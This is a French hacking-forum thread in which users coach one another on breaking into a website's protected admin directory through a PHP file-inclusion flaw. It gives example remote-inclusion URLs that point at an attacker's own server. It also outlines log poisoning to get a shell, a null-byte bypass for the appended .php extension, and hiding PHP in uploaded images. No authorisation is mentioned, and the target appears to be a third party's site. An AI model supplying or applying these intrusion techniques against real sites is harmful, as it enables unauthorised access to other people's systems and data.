[Mic32768]

Salut les Newbies

J'ai trouvé la section admin d'un site, rien de bien compliqué: http://www.site.com/admin et je demande votre aide pour réussir à ouvrir un éventuel .htpasswd qui protège ce répertoire. Si vous avez du temps devant vous, je vous explique la situation:

Ce site fonctionne à la manière suivante pour ouvrir les pages: http://www.site.com/index.php?nom_de_la_page.

Il existe donc sûrement un moyen d'ouvrir n'importe quel fichier avec cette manière de fonctionner d'autant plus qu'il ne filtre rien lorsque je tape n'importe quoi. Il me file cette erreur(lorsque je tape "hh" comme paramètre à index:

Warning: main(english/hh.php): failed to open stream: No such file or directory in /var/www/*************/public_html/index.php on line 50

Donc tout va bien... à part le fait qu'il rajoute .php au nom de fichier!

Connaissez-vous un moyen de bypasser ce "filtre" assez chiant? J'ai essayé de mettre des // et <!-- à la fin de la ligne mais ça s'intrègre malheureusement très bien dans le paramètre

Merci d'avance!

[Folcan]

Essaye de créé une page d'upload sur un de tes serveur perso, que tu appelera upload.php, et tu essaye de l'inclure du style :

http://lesite_faillible/index.php?http://ton_site/upload

Si t'arrive a un include externe, c'est tres bon.

[Mic32768]

Hey merci Folcan, c'est une excellente idée
Le seul problème, c'est que lorsque j'essaie d'inclure quelque chose d'externe,il
cherche absolument dans un des dossiers du serveur! Exemple:

Warning: main(): Failed opening 'english/http://monserveurmalefique/mouhaha.php' for inclusion

Mais si il y  a un moyen de passer ceci, alors l'accès est libre

[Folcan]

Et avec un ../ juste avant ?

Genre : http://lesite_faillible/index.php?../http://ton_site/upload
ou
http://lesite_faillible/index.php?/../http://ton_site/upload

po sur du tout...

[Nms]

Voyons messieurs! Il s'agit ici d'un include local, et non remote! Il est impossible d'inclure un fichier extérieur au serveur comme vous essayez de le faire!

Il y a plusieurs techniques pour s'en sortir, la meilleure étant à mon avis d'utiliser les logs du serveur pour essayer d'inclure du php et pouvoir ainsi avoir un shell. Mic32768 renseigne toi sur cette technique, tu arriveras surement à qqchose de probant! Le plus dur étant bien sûr de deviner le path des logs du serveur, mais il y a des listes de possibilités qui trainent sur le net dans différents exploits utilisant des includes locaux, donc après, il suffit de tester! Soit à la main, soit de manière automatisée avec un script... Mais il reste ici un problème assez épineux qui est l'addition de l'extension .php à l'include : soit les magic_quotes sont désactivées auquel cas un Null byte fera l'affaire (renseigne toi aussi dessus ça ne te fera de mal ), sinon ben là il faut ruser et avoir de la chance! Par exemple si tu as la possibilité d'uploader un fichier image par exemple sur le serveur, c'est gagné, je te laisse imaginer pourquoi. Si rien ne marche de tout ça, ben faut se creuser les méninges un peu plus ou abandonner!

Quoiqu'il en soit, stay on the safe side!